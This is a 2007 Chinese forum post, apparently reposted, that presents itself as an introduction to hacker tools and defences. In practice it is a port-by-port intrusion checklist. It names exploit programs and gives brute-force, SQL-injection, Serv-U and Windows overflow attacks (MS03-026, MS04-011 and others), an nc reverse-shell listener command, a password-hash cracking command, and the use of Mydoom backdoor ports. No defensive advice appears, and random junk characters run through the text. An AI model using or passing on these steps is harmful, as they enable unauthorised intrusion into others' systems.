 该用户从未签到
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 & z: L; x- v2 e6 p: h9 V9 G
" @! X, u7 Z0 F: D' k2 ^5 _! z
6 v2 o) Z2 q1 s+ {7 B( V
1. 1433端口入侵
% p9 \$ h' V2 j% w
" B b. W+ Y) l5 I: I- Y# N; [4 [' s scanport.exe 查有1433的机器 7 E. y/ f( Y- [) ?0 v
' \- U g$ j) n8 P SQLScanPass.exe 进行字典暴破(字典是关键) f4 h3 d, [. m/ m" V+ `
8 `; x4 M$ @5 A7 |4 W
最后 SQLTools.exe入侵
# w( d' s! ?2 Q; Y) w% r* M: \* g1 B7 c( }, `+ ~$ e
=============================
# N3 ^* x. }( l, u2 X$ T6 _
& s# J" g7 ]% h 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
2 w) q, V) ~. R; U, P2 x7 A0 t
5 t3 p! K+ _' t; x/ d+ L; y5 L3 q) E nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 $ z7 m3 c. \/ ^, t/ c# D% _+ w% L
4 c, t* n( @0 d' y; J
(以上反向的,测试成功)
# O6 U/ L7 j$ j. ]% [" _( K' L8 K& P& f Q5 G$ O( i# c1 `
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
) o V. ^% M% I6 K! Y% o: ]9 H5 y
9 o9 s- |/ [& r 2. 4899端口入侵 9 k! I8 J6 o. s; `% a, }
8 L( ^3 H8 q6 j
用4899过滤器.exe,扫描空口令的机器
& A6 E5 {& j7 \! c) U( W" d9 l( W. c' }- m1 |
3. 3899的入侵 # C0 o7 z2 X8 a, t+ m" G
8 J$ j5 p. X- N/ w/ c7 v& r
对很早的机器,可以试试3389的溢出(win3389ex.exe) 8 n2 c4 C W/ v# `
* v+ P! |1 a$ D0 h3 s. d% R 对2000的机器,可以试试字典暴破。(tscrack.exe) $ x) o6 O. [* S. J5 b% c
$ s8 y- K% y7 R 4. 80入侵
) H9 l4 \( G) o( k3 I7 b" T6 f2 G7 o+ H& d7 ]3 `8 a: d5 E9 V
对sp3以前的机器,可以用webdav入侵;
2 v& ?2 X v0 g, P/ K
' s" [1 |, Z9 q# K- g" [ 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
+ z8 [7 V0 d+ R8 \, E' e
! m4 y3 o5 N6 S A( v3 G0 A 可以利用SQL进行注入。(小榕的注入软件)。
5 w" j9 h1 J2 ]8 K1 k
5 i# L8 m4 E6 _& | 5. serv-u入侵(21端口)
* X( G9 s: |: X A/ M" t3 r. D: e. e
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) ; x4 A6 g& ^) ?( z0 y+ @
B0 e5 ^& C6 V' D9 Q6 h
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 8 H. Q( Y; n- n, x" D
. A; W' Y: C) d6 L& C
======================================
?% G4 V' m+ D/ f$ F1 b5 H4 P0 ]! o6 p
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) & R+ D5 U+ n3 i7 g3 W
z, o' @) k& _7 u. E8 s3 m7 L6 ^. H- u 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
: V+ }0 E2 E! {5 X% C2 q; C
/ S- e$ U1 u; N P A5 P; b 6. 554端口
: m0 E1 [4 i% h7 Q; t( f$ X2 h. I: d
; u; }" u( a- X- b 用real554.exe入侵。
. A1 J0 }. X! K+ v* ?& ]" U. Z
% C4 U. T$ w8 T# F1 ~- A 7. 6129端口 ^" j9 r# N, g3 u% K5 F7 y
0 B5 n, [$ ^7 w% T, W& j* A- f 用DameWare6129.exe入侵。 * p* D; \: _' Y9 [, f8 U
+ t' ^ f4 S) I, ^$ F 8. 系统漏洞
l/ D2 b4 z0 ~$ D+ a
- o* ]: E' v6 ]2 d) v' f# X 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
# A3 _5 G7 l! m; I$ z" t$ N n$ D! |
; @+ h H1 {* }) N# q 进行溢出入侵。
6 x- n' a# S0 g& C2 h* k! f" _
. I) s$ v# f, M# Q 9. 3127等端口 ' {6 i3 S8 f( z3 K, \+ |
: |, Y; q1 u' `* I* j 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
# k# x+ z; O- t& `2 \
" E* h; R& R5 ? o4 S5 A6 V7 R/ K 10. 其他入侵 ' F2 Z7 K1 p$ S" P+ f( K/ m4 X. l: n
/ u, @, X/ W8 Q& W$ h8 W 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。* L/ c3 p1 R- P2 h
- J+ P# p0 o0 J- W; E& w" C
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
